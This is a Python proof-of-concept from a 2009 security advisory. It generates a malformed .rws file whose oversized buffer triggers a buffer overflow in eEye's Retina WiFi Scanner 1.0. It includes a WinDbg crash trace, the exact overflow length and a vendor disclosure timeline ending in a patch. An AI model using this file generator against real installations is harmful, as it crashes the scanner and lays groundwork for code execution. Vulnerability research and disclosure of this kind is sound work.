#!/usr/bin/python
#
#
# * Title: Retina WiFi Security Scanner 1.0 (.rws parsing) Buffer Overflow Vulnerability
#
#
# * Summary: Retina WiFi Scanner is a tool to be used to detect IEEE 802.11 (WiFi) based devices.
# * Vendor: eEye Digital Security Inc.
# * Product Web Page: http://www.eeye.com/
# * Current Version: 1.0.8.68
# * Notiz: The tool is implemented as part of the eEye's Retina Network Security Scanner package.
# * Tested On Microsoft Windows XP Professional SP3 (English)
#
# * Vulnerability Discovered By Gjoko 'LiquidWorm' Krstic
# * liquidworm gmail com
# * http://www.zeroscience.org
# * 16.05.2009
#
# * Original Advisory: http://www.zeroscience.org/codes/retinawifi_bof.txt
# * eEye Advisory: http://research.eeye.com/html/advisories/published/AD20090710.html
#
#
# * --------------------------------windbg---------------------------------- *
#
# (1268.dd8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=41414141 ebx=00000003 ecx=000006d8 edx=00000000 esi=0000006c edi=10264da0
# eip=1001dcce esp=0012e72c ebp=0012e754 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
# *** Defaulted to export symbols for [path]\WiFiCore.dll -
# WiFiCore!LibWifi_ReportHTML+0x1b48e:
# 1001dcce f644300401 test byte ptr [eax+esi+4],1 ds:0023:414141b1=??
# 0:000> g
# (1268.dd8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000010 ebx=41414141 ecx=00000000 edx=41414141 esi=00001000 edi=41414150
# eip=7c809eda esp=00121484 ebp=001214b0 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
# *** Defaulted to export symbols for [path]\kernel32.dll -
# kernel32!IsBadReadPtr+0x39:
# 7c809eda 8a02 mov al,byte ptr [edx] ds:0023:41414141=??
#
# * -------------------------------/windbg---------------------------------- *
#
#
# * Disclosure Timeline:
#
# * [16.05.2009] Vulnerability discovered.
# * [16.05.2009] Initial contact with the vendor with description included + screenshot + proof
# of concept code.
# * [18.05.2009] Vendor contacted again for confirmation of the vulnerability because of no reply
# from previous e-mail.
# * [18.05.2009] Vendor replied and acknowledged the vulnerability. Patch development process in
# progress.
# * [25.05.2009] Vendor contacted for information on patch development and its release process
# because of our advisory disclosure policy.
# * [29.05.2009] Vendor contacted again for information on patch development because of no reply
# from previous e-mail.
# * [29.05.2009] Vendor answered. Bug fixes scheduled within next week.
# * [08.06.2009] Vendor contacted for an accurate date of a patch release or scheduled bug fix
# time line information.
# * [08.06.2009] Vendor replied and confirmed that the vulnerability has been mitigated and passed
# the QA. The fix will be introduced in the next release of the product. Scheduled
# date for the release of the update is not yet known...or...it's unknown :) .
# * [12.06.2009] Vendor informs that the fix will be released along with the new scheduled release
# of the Retina package approximately on 29th of June.
# * [29.06.2009] Contacted the vendor, asked for a more accurate (fixed) date of the release.
# * [29.06.2009] Vendor says that the patch is being tested by the QA team along with other program
# * fixes. Vendor will contact me after the tests, with the results from the same.
# * [06.07.2009] Sent an e-mail to the vendor stating that the advisory is planned to be published
# * on 10th of july because of internal company reasons.
# * [10.07.2009] Vendor releases patch: http://download.eeye.com/html/products/retinawireless/
# * [10.07.2009] Public advisory released.
#
#
#
# * Pozdrav Do:
#
# * sm, thricer, drowsy, Jayji, Leon Juranic,
# * teppei, n3tpr0b3, DrunkY, apo, Aodrulez,
# * kokanin, e.wiZz!, j0rgan, str0ke, Uploader,
# * Jonathan Salwan, Sergio 'shadown' Alvarez,
# * Malformation, dz0, d3, Greg Linares, lio,
# * mio, drown, dni, Damjan, Maximiliano Soler,
# * leetgeek, Preddy, Gliser, eSDee i t.d. :)
#
#
# * Proof Of Concept:
#
#=========================================*snip*=========================================#
header = (
"\x52\x57\x53"
"\x30\x31\x30"
"\x19\x52\x76"
"\x00"
)
buffer = "\x41" * 1574624 #[Bytes/chars]
#1574622 No issues
#1574623 BoF, Access violation when reading [random]
#1574624 BoF, Access violation when reading [414141B1]
#...
payload = header + buffer
file = "Abulia.rws"
filetzio=open(file,'w')
filetzio.write(payload)
filetzio.close()
print "\n[+] File " + file + " successfully landed.\n"
#=========================================*snip*=========================================#
#################################################################################
# #
# * Disclaimer: #
# #
# * This document and all the information it contains are provided "as is", #
# * for educational purposes only, without warranty of any kind, whether #
# * express or implied. #
# #
# * The author reserves the right not to be responsible for the topicality, #
# * correctness, completeness or quality of the information provided in #
# * this document. Liability claims regarding damage caused by the use of #
# * any information provided, including any kind of information which is #
# * incomplete or incorrect, will therefore be rejected. #
# #
#################################################################################
# milw0rm.com [2009-07-10]
